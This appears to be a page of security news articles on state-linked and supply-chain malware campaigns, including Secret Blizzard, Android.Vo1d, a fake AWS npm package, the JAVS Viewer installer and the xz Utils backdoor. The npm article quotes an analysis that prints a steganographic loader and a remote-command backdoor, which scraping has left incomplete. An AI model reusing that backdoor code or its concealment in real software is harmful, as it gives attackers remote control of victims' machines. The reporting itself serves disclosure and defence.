

Russia takes unusual route to hack Starlink-connected devices in Ukraine

“Microsoft assesses that Secret Blizzard either used the Amadey malware as a service (MaaS) or accessed the Amadey command-and-control (C2) panels surreptitiously to download a PowerShell dropper on target devices,” Microsoft said. “The PowerShell dropper contained a Base64-encoded Amadey payload appended by code that invoked a request to Secret Blizzard C2 infrastructure.”

The ultimate objective was to install Tavdig, a backdoor Secret Blizzard used to conduct reconnaissance on targets of interest. The Amdey sample Microsoft uncovered collected information from device clipboards and harvested passwords from browsers. It would then go on to install a custom reconnaissance tool that was “selectively deployed to devices of further interest by the threat actor—for example, devices egressing from STARLINK IP addresses, a common signature of Ukrainian front-line military devices.”

When Secret Blizzard assessed a target was of high value, it would then install Tavdig to collect information, including “user info, netstat, and installed patches and to import registry settings into the compromised device.”

Earlier in the year, Microsoft said, company investigators observed Secret Blizzard using tools belonging to Storm-1887 to also target Ukrainian military personnel. Microsoft researchers wrote:

In January 2024, Microsoft observed a military-related device in Ukraine compromised by a Storm-1837 backdoor configured to use the Telegram API to launch a cmdlet with credentials (supplied as parameters) for an account on the file-sharing platform Mega. The cmdlet appeared to have facilitated remote connections to the account at Mega and likely invoked the download of commands or files for launch on the target device. When the Storm-1837 PowerShell backdoor launched, Microsoft noted a PowerShell dropper deployed to the device. The dropper was very similar to the one observed during the use of Amadey bots and contained two base64 encoded files containing the previously referenced Tavdig backdoor payload (rastls.dll) and the Symantec binary (kavp.exe).

As with the Amadey bot attack chain, Secret Blizzard used the Tavdig backdoor loaded into kavp.exe to conduct initial reconnaissance on the device. Secret Blizzard then used Tavdig to import a registry file, which was used to install and provide persistence for the KazuarV2 backdoor, which was subsequently observed launching on the affected device.

Although Microsoft did not directly observe the Storm-1837 PowerShell backdoor downloading the Tavdig loader, based on the temporal proximity between the execution of the Storm-1837 backdoor and the observation of the PowerShell dropper, Microsoft assesses that it is likely that the Storm-1837 backdoor was used by Secret Blizzard to deploy the Tavdig loader.

Wednesday’s post comes a week after both Microsoft and Lumen’s Black Lotus Labs reported that Secret Blizzard co-opted the tools of a Pakistan-based threat group tracked as Storm-0156 to install backdoors and collect intel on targets in South Asia. Microsoft first observed the activity in late 2022. In all, Microsoft said, Secret Blizzard has used the tools and infrastructure of at least six other threat groups in the past seven years.

Russia takes unusual route to hack Starlink-connected devices in Ukraine Read More »


1.3 million Android-based TV boxes backdoored; researchers still don’t know how


Infection corrals devices running AOSP-based firmware into a botnet.

1.3 million Android-based TV boxes backdoored; researchers still don’t know how

Getty Images

Researchers still don’t know the cause of a recently discovered malware infection affecting almost 1.3 million streaming devices running an open source version of Android in almost 200 countries.

Security firm Doctor Web reported Thursday that malware named Android.Vo1d has backdoored the Android-based boxes by putting malicious components in their system storage area, where they can be updated with additional malware at any time by command-and-control servers. Google representatives said the infected devices are running operating systems based on the Android Open Source Project, a version overseen by Google but distinct from Android TV, a proprietary version restricted to licensed device makers.

Dozens of variants

Although Doctor Web has a thorough understanding of Vo1d and the exceptional reach it has achieved, company researchers say they have yet to determine the attack vector that has led to the infections.

“At the moment, the source of the TV boxes’ backdoor infection remains unknown,” Thursday’s post stated. “One possible infection vector could be an attack by an intermediate malware that exploits operating system vulnerabilities to gain root privileges. Another possible vector could be the use of unofficial firmware versions with built-in root access.”

The following device models infected by Vo1d are:

TV box model Declared firmware version
R4 Android 7.1.2; R4 Build/NHG47K
TV BOX Android 12.1; TV BOX Build/NHG47K

One possible cause of the infections is that the devices are running outdated versions that are vulnerable to exploits that remotely execute malicious code on them. Versions 7.1, 10.1, and 12.1, for example, were released in 2016, 2019, and 2022, respectively. What’s more, Doctor Web said it’s not unusual for budget device manufacturers to install older OS versions in streaming boxes and make them appear more attractive by passing them off as more up-to-date models.

Further, while only licensed device makers are permitted to modify Google’s AndroidTV, any device maker is free to make changes to open source versions. That leaves open the possibility that the devices were infected in the supply chain and were already compromised by the time they were purchased by the end user.

“These off-brand devices discovered to be infected were not Play Protect certified Android devices,” Google said in a statement. “If a device isn’t Play Protect certified, Google doesn’t have a record of security and compatibility test results. Play Protect certified Android devices undergo extensive testing to ensure quality and user safety.”

The statement said people can confirm a device runs Android TV OS by checking this link and following the steps listed here.

Doctor Web said that there are dozens of Vo1d variants that use different code and plant malware in slightly different storage areas, but that all achieve the same end result of connecting to an attacker-controlled server and installing a final component that can install additional malware when instructed. VirusTotal shows that most of the Vo1d variants were first uploaded to the malware identification site several months ago.

Researchers wrote:

All these cases involved similar signs of infection, so we will describe them using one of the first requests we received as an example. The following objects were changed on the affected TV box:

  • daemonsu

In addition, 4 new files emerged in its file system:

  • /system/xbin/vo1d
  • /system/xbin/wd
  • /system/bin/debuggerd
  • /system/bin/debuggerd_real

The vo1d and wd files are the components of the Android.Vo1d trojan that we discovered.

The trojan’s authors probably tried to disguise one if its components as the system program /system/bin/vold, having called it by the similar-looking name “vo1d” (substituting the lowercase letter “l” with the number “1”). The malicious program’s name comes from the name of this file. Moreover, this spelling is consonant with the English word “void”.

The file is a script that is present on most Android devices. It runs when the operating system is launched and contains data for autorunning the elements specified in it. If any malware has root access and the ability to write to the /system system directory, it can anchor itself in the infected device by adding itself to this script (or by creating it from scratch if it is not present in the system). Android.Vo1d has registered the autostart for the wd component in this file.

The modified file

The modified file

Doctor Web

The daemonsu file is present on many Android devices with root access. It is launched by the operating system when it starts and is responsible for providing root privileges to the user. Android.Vo1d registered itself in this file, too, having also set up autostart for the wd module.

The debuggerd file is a daemon that is typically used to create reports on occurred errors. But when the TV box was infected, this file was replaced by the script that launches the wd component.

The debuggerd_real file in the case we are reviewing is a copy of the script that was used to substitute the real debuggerd file. Doctor Web experts believe that the trojan’s authors intended the original debuggerd to be moved into debuggerd_real to maintain its functionality. However, because the infection probably occurred twice, the trojan moved the already substituted file (i.e., the script). As a result, the device had two scripts from the trojan and not a single real debuggerd program file.

At the same time, other users who contacted us had a slightly different list of files on their infected devices:

  • daemonsu (the vo1d file analogue — Android.Vo1d.1);
  • wd (Android.Vo1d.3);
  • debuggerd (the same script as described above);
  • debuggerd_real (the original file of the debuggerd tool);
  • (a script that loads objects specified in it).

An analysis of all the aforementioned files showed that in order to anchor Android.Vo1d in the system, its authors used at least three different methods: modification of the and daemonsu files and substitution of the debuggerd program. They probably expected that at least one of the target files would be present in the infected system, since manipulating even one of them would ensure the trojan’s successful auto launch during subsequent device reboots.

Android.Vo1d’s main functionality is concealed in its vo1d (Android.Vo1d.1) and wd (Android.Vo1d.3) components, which operate in tandem. The Android.Vo1d.1 module is responsible for Android.Vo1d.3’s launch and controls its activity, restarting its process if necessary. In addition, it can download and run executables when commanded to do so by the C&C server. In turn, the Android.Vo1d.3 module installs and launches the Android.Vo1d.5 daemon that is encrypted and stored in its body. This module can also download and run executables. Moreover, it monitors specified directories and installs the APK files that it finds in them.

The geographic distribution of the infections is wide, with the biggest number detected in Brazil, Morocco, Pakistan, Saudi Arabia, Russia, Argentina, Ecuador, Tunisia, Malaysia, Algeria, and Indonesia.

A world map listing the number of infections found in various countries.

Enlarge / A world map listing the number of infections found in various countries.

Doctor Web

It’s not especially easy for less experienced people to check if a device is infected short of installing malware scanners. Doctor Web said its antivirus software for Android will detect all Vo1d variants and disinfect devices that provide root access. More experienced users can check indicators of compromise here.

1.3 million Android-based TV boxes backdoored; researchers still don’t know how Read More »


Here’s how carefully concealed backdoor in fake AWS files escaped mainstream notice


Files available on the open source NPM repository underscore a growing sophistication.

A cartoon door leads to a wall of computer code.

Researchers have determined that two fake AWS packages downloaded hundreds of times from the open source NPM JavaScript repository contained carefully concealed code that backdoored developers’ computers when executed.

The packages—img-aws-s3-object-multipart-copy and legacyaws-s3-object-multipart-copy—were attempts to appear as aws-s3-object-multipart-copy, a legitimate JavaScript library for copying files using Amazon’s S3 cloud service. The fake files included all the code found in the legitimate library but added an additional JavaScript file named loadformat.js. That file provided what appeared to be benign code and three JPG images that were processed during package installation. One of those images contained code fragments that, when reconstructed, formed code for backdooring the developer device.

Growing sophistication

“We have reported these packages for removal, however the malicious packages remained available on npm for nearly two days,” researchers from Phylum, the security firm that spotted the packages, wrote. “This is worrying as it implies that most systems are unable to detect and promptly report on these packages, leaving developers vulnerable to attack for longer periods of time.”

In an email, Phylum Head of Research Ross Bryant said img-aws-s3-object-multipart-copy received 134 downloads before it was taken down. The other file, legacyaws-s3-object-multipart-copy, got 48.

The care the package developers put into the code and the effectiveness of their tactics underscores the growing sophistication of attacks targeting open source repositories, which besides NPM have included PyPI, GitHub, and RubyGems. The advances made it possible for the vast majority of malware-scanning products to miss the backdoor sneaked into these two packages. In the past 17 months, threat actors backed by the North Korean government have targeted developers twice, one of those using a zero-day vulnerability.

Phylum researchers provided a deep-dive analysis of how the concealment worked:

Analyzing the loadformat.js file, we find what appears to be some fairly innocuous image analysis code.

However, upon closer review, we see that this code is doing a few interesting things, resulting in execution on the victim machine.

After reading the image file from the disk, each byte is analyzed. Any bytes with a value between 32 and 126 are converted from Unicode values into a character and appended to the analyzepixels variable.

function processImage(filePath)   	console.log("Processing image...");  	const data = fs.readFileSync(filePath);  	let analyzepixels = "";  	let convertertree = false;    	for (let i = 0; i < data.length; i++) {      	const value = data[i];      	if (value >= 32 && value <= 126) {          	analyzepixels += String.fromCharCode(value);      	} else {          	if (analyzepixels.length > 2000)               	convertertree = true;              	break;          	          	analyzepixels = "";      	  	}        	// ...  

The threat actor then defines two distinct bodies of a function and stores each in their own variables, imagebyte and analyzePixels.

let analyzePixеls = `  	if (false)       	exec("node -v", (error, stdout, stderr) =>           	console.log(stdout);      	);  	  	console.log("check nodejs version...");  	`;    let imagebyte = `  	const httpsOptions =       	hostname: '',      	path: '/image-converter',      	method: 'POST'  	;  	const req = https.request(httpsOptions, res =>       	console.log('Status Code:', res.statusCode);  	);  	req.on('error', error =>       	console.error(error);  	);  	req.end();  	console.log("Executing operation...");  	`;  

If convertertree is set to true, imagebyte is set to analyzepixels. In plain language, if converttree is set, it will execute whatever is contained in the script we extracted from the image file.

if (convertertree)   	console.log("Optimization complete. Applying advanced features...");  	imagebyte = analyzepixels;   else   	console.log("Optimization complete. No advanced features applied.");    

Looking back above, we note that convertertree will be set to true if the length of the bytes found in the image is greater than 2,000.

if (analyzepixels.length > 2000)     convertertree = true;    break;    

The author then creates a new function using either code that sends an empty POST request to or initiates executing whatever was extracted from the image files.

const func = new Function('https', 'exec', 'os', imagebyte);  func(https, exec, os);  

The lingering question is, what is contained in the images that this is trying to execute?

Command-and-Control in a JPEG

Looking at the bottom of the loadformat.js file, we see the following:

processImage('logo1.jpg');  processImage('logo2.jpg');  processImage('logo3.jpg');  

We find these three files in the package’s root, which are included below without modification, unless otherwise noted.

Appears as logo1.jpg in the package
Appears as logo2.jpg in the package
Appears as logo3.jpg in the package. Modified here as the file is corrupted and in some cases would not display properly.

If we run each of these through the processImage(...) function from above, we find that the Intel image (i.e., logo1.jpg) does not contain enough “valid” bytes to set the converttree variable to true. The same goes for logo3.jpg, the AMD logo. However, for the Microsoft logo (logo2.jpg), we find the following, formatted for readability:

let fetchInterval = 0x1388;  let intervalId = setInterval(fetchAndExecuteCommand, fetchInterval);  const clientInfo =     'name': os.hostname(),    'os': os.type() + " " + os.release()  ;  const agent = new https.Agent(    'rejectUnauthorized': false  );  function registerClient()     const _0x47c6de = JSON.stringify(clientInfo);    const _0x5a10c1 =   	'hostname': "",  	'port': 0x1bb,  	'path': "",  	'method': "POST",  	'headers':     	'Content-Type': "application/json",    	'Content-Length': Buffer.byteLength(_0x47c6de)  	,  	'agent': agent    ;    const _0x38f695 = https.request(_0x5a10c1, _0x454719 =>   	console.log("Registered with server as " +;    );    _0x38f695.on("error", _0x1159ec =>   	console.error("Problem with registration: " + _0x1159ec.message);    );    _0x38f695.write(_0x47c6de);    _0x38f695.end();    function fetchAndExecuteCommand()     const _0x2dae30 =   	'hostname': "",  	'port': 0x1bb,  	'path': "" + encodeURIComponent(,  	'method': "GET",  	'agent': agent    ;    https.get(_0x2dae30, _0x4a0c09 =>   	let _0x41cd12 = '';  	_0x4a0c09.on("data", _0x5cbbc5 =>     	_0x41cd12 += _0x5cbbc5.toString();  	);  	_0x4a0c09.on("end", () =>     	console.log("Received command:", _0x41cd12);    	if (_0x41cd12.startsWith('setInterval:'))       	const _0x1e3896 = parseInt(_0x41cd12.split(':')[0x1], 0xa);      	if (!isNaN(_0x1e3896) && _0x1e3896 > 0x0)         	clearInterval(intervalId);        	fetchInterval = _0x1e3896 0x3e8;        	intervalId = setInterval(fetchAndExecuteCommand, fetchInterval);        	console.log("Interval has been updated to " + _0x1e3896 + " seconds.");      	 else         	console.log("Invalid interval command received.");      	    	 else       	if (_0x41cd12.startsWith("cd "))         	const _0x58bd7d = _0x41cd12.substring(0x3).trim();        	try           	process.chdir(_0x58bd7d);          	console.log("Changed directory to " + process.cwd());        	 catch (_0x2ee272)           	console.error("Change directory failed: " + _0x2ee272);        	      	 else if (_0x41cd12 !== "No commands")         	exec(_0x41cd12,           	'cwd': process.cwd()        	, (_0x5da676, _0x1ae10c, _0x46788b) =>           	let _0x4a96cd = _0x1ae10c;          	if (_0x5da676)             	console.error("exec error: " + _0x5da676);            	_0x4a96cd += "\nError: " + _0x46788b;          	          	postResult(_0x4a96cd);        	);      	 else         	console.log("No commands to execute");      	    	  	);    ).on("error", _0x2e8190 =>   	console.error("Got error: " + _0x2e8190.message);    );    function postResult(_0x1d73c1)     const _0xc05626 =   	'hostname': "",  	'port': 0x1bb,  	'path': "" + encodeURIComponent(,  	'method': "POST",  	'headers':     	'Content-Type': "text/plain",    	'Content-Length': Buffer.byteLength(_0x1d73c1)  	,  	'agent': agent    ;    const _0x2fcb05 = https.request(_0xc05626, _0x448ba6 =>   	console.log("Result sent to the server");    );    _0x2fcb05.on('error', _0x1f60a7 =>   	console.error("Problem with request: " + _0x1f60a7.message);    );    _0x2fcb05.write(_0x1d73c1);    _0x2fcb05.end();    registerClient();  

This code first registers the new client with the remote C2 by sending the following clientInfo to

const clientInfo =     'name': os.hostname(),    'os': os.type() + " " + os.release()  ;  

It then sets up an interval that periodically loops through and fetches commands from the attacker every 5 seconds.

let fetchInterval = 0x1388;  let intervalId = setInterval(fetchAndExecuteCommand, fetchInterval);  

Received commands are executed on the device, and the output is sent back to the attacker on the endpoint /post-results?clientId=.

One of the most innovative methods in recent memory for concealing an open source backdoor was discovered in March, just weeks before it was to be included in a production release of the XZ Utils, a data-compression utility available on almost all installations of Linux. The backdoor was implemented through a five-stage loader that used a series of simple but clever techniques to hide itself. Once installed, the backdoor allowed the threat actors to log in to infected systems with administrative system rights.

The person or group responsible spent years working on the backdoor. Besides the sophistication of the concealment method, the entity devoted large amounts of time to producing high-quality code for open source projects in a successful effort to build trust with other developers.

In May, Phylum disrupted a separate campaign that backdoored a package available in PyPI that also used steganography, a technique that embeds secret code into images.

“In the last few years, we’ve seen a dramatic rise in the sophistication and volume of malicious packages published to open source ecosystems,” Phylum researchers wrote. “Make no mistake, these attacks are successful. It is absolutely imperative that developers and security organizations alike are keenly aware of this fact and are deeply vigilant with regard to open source libraries they consume.”

Here’s how carefully concealed backdoor in fake AWS files escaped mainstream notice Read More »


Crooks plant backdoor in software used by courtrooms around the world


It’s unclear how the malicious version of JAVS Viewer came to be.

Crooks plant backdoor in software used by courtrooms around the world


A software maker serving more than 10,000 courtrooms throughout the world hosted an application update containing a hidden backdoor that maintained persistent communication with a malicious website, researchers reported Thursday, in the latest episode of a supply-chain attack.

The software, known as the JAVS Viewer 8, is a component of the JAVS Suite 8, an application package courtrooms use to record, play back, and manage audio and video from proceedings. Its maker, Louisville, Kentucky-based Justice AV Solutions, says its products are used in more than 10,000 courtrooms throughout the US and 11 other countries. The company has been in business for 35 years.

JAVS Viewer users at high risk

Researchers from security firm Rapid7 reported that a version of the JAVS Viewer 8 available for download on contained a backdoor that gave an unknown threat actor persistent access to infected devices. The malicious download, planted inside an executable file that installs the JAVS Viewer version 8.3.7, was available no later than April 1, when a post on X (formerly Twitter) reported it. It’s unclear when the backdoored version was removed from the company’s download page. JAVS representatives didn’t immediately respond to questions sent by email.

“Users who have version 8.3.7 of the JAVS Viewer executable installed are at high risk and should take immediate action,” Rapid7 researchers Ipek Solak, Thomas Elkins, Evan McCann, Matthew Smith, Jake McMahon, Tyler McGraw, Ryan Emmons, Stephen Fewer, and John Fenninger wrote. “This version contains a backdoored installer that allows attackers to gain full control of affected systems.”

The installer file was titled JAVS Viewer Setup When executed, it copied the binary file fffmpeg.exe to the file path C:Program Files (x86)JAVSViewer 8. To bypass security warnings, the installer was digitally signed, but with a signature issued to an entity called “Vanguard Tech Limited” rather than to “Justice AV Solutions Inc.,” the signing entity used to authenticate legitimate JAVS software.

fffmpeg.exe, in turn, used Windows Sockets and WinHTTP to establish communications with a command-and-control server. Once successfully connected, fffmpeg.exe sent the server passwords harvested from browsers and data about the compromised host, including hostname, operating system details, processor architecture, program working directory, and the user name.

The researchers said fffmpeg.exe also downloaded the file chrome_installer.exe from the IP address chrome_installer.exe went on to execute a binary and several Python scripts that were responsible for stealing the passwords saved in browsers. fffmpeg.exe is associated with a known malware family called GateDoor/Rustdoor. The exe file was already flagged by 30 endpoint protection engines.

A screenshot from VirusTotal showing detections from 30 endpoint protection engines.

Enlarge / A screenshot from VirusTotal showing detections from 30 endpoint protection engines.


The number of detections had grown to 38 at the time this post went live.

The researchers warned that the process of disinfecting infected devices will require care. They wrote:

To remediate this issue, affected users should:

  • Reimage any endpoints where JAVS Viewer 8.3.7 was installed. Simply uninstalling the software is insufficient, as attackers may have implanted additional backdoors or malware. Re-imaging provides a clean slate.
  • Reset credentials for any accounts that were logged into affected endpoints. This includes local accounts on the endpoint itself as well as any remote accounts accessed during the period when JAVS Viewer 8.3.7 was installed. Attackers may have stolen credentials from compromised systems.
  • Reset credentials used in web browsers on affected endpoints. Browser sessions may have been hijacked to steal cookies, stored passwords, or other sensitive information.
  • Install the latest version of JAVS Viewer (8.3.8 or higher) after re-imaging affected systems. The new version does not contain the backdoor present in 8.3.7.

Completely re-imaging affected endpoints and resetting associated credentials is critical to ensure attackers have not persisted through backdoors or stolen credentials. All organizations running JAVS Viewer 8.3.7 should take these steps immediately to address the compromise.

The Rapid7 post included a statement from JAVS that confirmed that the installer for version 8.3.7 of the JAVS viewer was malicious.

“We pulled all versions of Viewer 8.3.7 from the JAVS website, reset all passwords, and conducted a full internal audit of all JAVS systems,” the statement read. “We confirmed all currently available files on the website are genuine and malware-free. We further verified that no JAVS Source code, certificates, systems, or other software releases were compromised in this incident.”

The statement didn’t explain how the installer became available for download on its site. It also didn’t say if the company retained an outside firm to investigate.

The incident is the latest example of a supply-chain attack, a technique that tampers with a legitimate service or piece of software with the aim of infecting all downstream users. These sorts of attacks are usually carried out by first hacking the provider of the service or software. There’s no sure way to prevent falling victim to supply-chain attacks, but one potentially useful measure is to vet a file using VirusTotal before executing it. That advice would have served JAVS users well.

Crooks plant backdoor in software used by courtrooms around the world Read More »


Hackers infect users of antivirus service that delivered updates over HTTP


eScan AV updates were delivered over HTTP for five years.

Hackers infect users of antivirus service that delivered updates over HTTP

Getty Images

Hackers abused an antivirus service for five years in order to infect end users with malware. The attack worked because the service delivered updates over HTTP, a protocol vulnerable to attacks that corrupt or tamper with data as it travels over the Internet.

The unknown hackers, who may have ties to the North Korean government, pulled off this feat by performing a man-in-the-middle (MiitM) attack that replaced the genuine update with a file that installed an advanced backdoor instead, said researchers from security firm Avast today.

eScan, an AV service headquartered in India, has delivered updates over HTTP since at least 2019, Avast researchers reported. This protocol presented a valuable opportunity for installing the malware, which is tracked in security circles under the name GuptiMiner.

“This sophisticated operation has been performing MitM attacks targeting an update mechanism of the eScan antivirus vendor,” Avast researchers Jan Rubín and Milánek wrote. “We disclosed the security vulnerability to both eScan and the India CERT and received confirmation on 2023-07-31 from eScan that the issue was fixed and successfully resolved.”

Complex infection chain

The complex infection chain started when eScan applications checked in with the eScan update system. The threat actors then performed a MitM attack that allowed them to intercept the package sent by the update server and replace it with a corrupted one that contained code to install GuptiMiner. The Avast researchers still don’t know precisely how the attackers were able to perform the interception. They suspect targeted networks may already have been compromised somehow to route traffic to a malicious intermediary.

To lower the chances of detection, the infection file used DLL hijacking, a technique that replaces legitimate dynamic link library files used by most Microsoft apps with maliciously crafted ones that use the same file name. For added stealth, the infection chain also relied on a custom domain name system (DNS)  server that allowed it to use legitimate domain names when connecting to attacker-controlled channels.

Last year, the attackers abandoned the DNS technique and replaced it with another obfuscation technique known as IP address masking. This involved the following steps:

  1. Obtain an IP address of a hardcoded server name registered to the attacker by standard use of the gethostbyname API function
  2. For that server, two IP addresses are returned—the first is an IP address which is a masked address, and the second one denotes an available payload version and starts with 23.195. as its first two octets
  3. If the version is newer than the current one, the masked IP address is de-masked, resulting in a real command-and-control (C&C) IP address
  4. The real C&C IP address is used along with a hardcoded constant string (part of a URL path) to download a file containing malicious shellcode

Some variants of the infection chain stashed the malicious code inside an image file to make them harder to detect. The variants also installed a custom root TLS certificate that satisfied requirements by some targeted systems that all apps must be digitally signed before being installed.

The payload contained multiple backdoors that were activated when installed on large networks. Curiously, the update also delivered XMRig, an open-source package for mining cryptocurrency.

The GuptiMiner infection chain.

Enlarge / The GuptiMiner infection chain.


GuptiMiner has circulated since at least 2018 and has undergone multiple revisions. One searched compromised networks for systems running Windows 7 and Windows Server 2008, presumably to deliver exploits that worked on those earlier versions. Another provided an interface for installing special-purpose modules that could be customized for different victims. (This version also scanned the local system for stored private keys and cryptocurrency wallets.)

The researchers were surprised that malware that took such pains to fly under the radar would also install a cryptocurrency miner, which by nature is usually easy to detect. One possibility is the attackers’ possible connection to Kimsuky, the tracking name for a group backed by the North Korean government. Over the years, North Korea’s government has generated billions of dollars in cryptocurrency through malware installed on the devices of unwitting victims. The researchers made the possible connection after finding similarities between a known Kimsuky keylogger and code fragments used during the GuptiMiner operation.

The GuptiMiner attack is notable for exposing major shortcomings in eScan that went unnoticed for at least five years. Besides not delivering updates over HTTPS, a medium not susceptible to MitM attacks, eScan also failed to enforce digital signing to ensure updates hadn’t been tampered with before being installed. Representatives of eScan didn’t respond to an email asking why engineers designed the update process this way.

People who use or have used eScan should check the Avast post for details on whether their systems are infected. It’s likely that most reputable AV scanners will also detect this infection.

Hackers infect users of antivirus service that delivered updates over HTTP Read More »


Backdoor found in widely used Linux utility breaks encrypted SSH connections


Malicious code planted in xz Utils has been circulating for more than a month.

Internet Backdoor in a string of binary code in a shape of an eye.

Enlarge / Internet Backdoor in a string of binary code in a shape of an eye.

Getty Images

Researchers have found a malicious backdoor in a compression tool that made its way into widely used Linux distributions, including those from Red Hat and Debian.

The compression utility, known as xz Utils, introduced the malicious code in versions ​​5.6.0 and 5.6.1, according to Andres Freund, the developer who discovered it. There are no known reports of those versions being incorporated into any production releases for major Linux distributions, but both Red Hat and Debian reported that recently published beta releases used at least one of the backdoored versions—specifically, in Fedora 40 and Fedora Rawhide and Debian testing, unstable and experimental distributions. A stable release of Arch Linux is also affected. That distribution, however, isn’t used in production systems.

Because the backdoor was discovered before the malicious versions of xz Utils were added to production versions of Linux, “it’s not really affecting anyone in the real world,” Will Dormann, a senior vulnerability analyst at security firm Analygence, said in an online interview. “BUT that’s only because it was discovered early due to bad actor sloppiness. Had it not been discovered, it would have been catastrophic to the world.”

Several people, including two Ars readers, reported that the multiple apps included in the HomeBrew package manager for macOS rely on the backdoored 5.6.1 version of xz Utils. HomeBrew has now rolled back the utility to version 5.4.6. Maintainers have more details available here.

Breaking SSH authentication

The first signs of the backdoor were introduced in a February 23 update that added obfuscated code, officials from Red Hat said in an email. An update the following day included a malicious install script that injected itself into functions used by sshd, the binary file that makes SSH work. The malicious code has resided only in the archived releases—known as tarballs—which are released upstream. So-called GIT code available in repositories aren’t affected, although they do contain second-stage artifacts allowing the injection during the build time. In the event the obfuscated code introduced on February 23 is present, the artifacts in the GIT version allow the backdoor to operate.

The malicious changes were submitted by JiaT75, one of the two main xz Utils developers with years of contributions to the project.

“Given the activity over several weeks, the committer is either directly involved or there was some quite severe compromise of their system,” an official with distributor OpenWall wrote in an advisory. “Unfortunately the latter looks like the less likely explanation, given they communicated on various lists about the ‘fixes’” provided in recent updates. Those updates and fixes can be found here, here, here, and here.

On Thursday, someone using the developer’s name took to a developer site for Ubuntu to ask that the backdoored version 5.6.1 be incorporated into production versions because it fixed bugs that caused a tool known as Valgrind to malfunction.

“This could break build scripts and test pipelines that expect specific output from Valgrind in order to pass,” the person warned, from an account that was created the same day.

One of maintainers for Fedora said Friday that the same developer approached them in recent weeks to ask that Fedora 40, a beta release, incorporate one of the backdoored utility versions.

“We even worked with him to fix the valgrind issue (which it turns out now was caused by the backdoor he had added),” the Ubuntu maintainer said.

He has been part of the xz project for two years, adding all sorts of binary test files, and with this level of sophistication, we would be suspicious of even older versions of xz until proven otherwise.

Maintainers for xz Utils didn’t immediately respond to emails asking questions.

The malicious versions, researchers said, intentionally interfere with authentication performed by SSH, a commonly used protocol for connecting remotely to systems. SSH provides robust encryption to ensure that only authorized parties connect to a remote system. The backdoor is designed to allow a malicious actor to break the authentication and, from there, gain unauthorized access to the entire system. The backdoor works by injecting code during a key phase of the login process.

“I have not yet analyzed precisely what is being checked for in the injected code, to allow unauthorized access,” Freund wrote. “Since this is running in a pre-authentication context, it seems likely to allow some form of access or other form of remote code execution.”

In some cases, the backdoor has been unable to work as intended. The build environment on Fedora 40, for example, contains incompatibilities that prevent the injection from correctly occurring. Fedora 40 has now reverted to the 5.4.x versions of xz Utils.

Xz Utils is available for most if not all Linux distributions, but not all of them include it by default. Anyone using Linux should check with their distributor immediately to determine if their system is affected. Freund provided a script for detecting if an SSH system is vulnerable.

Backdoor found in widely used Linux utility breaks encrypted SSH connections Read More »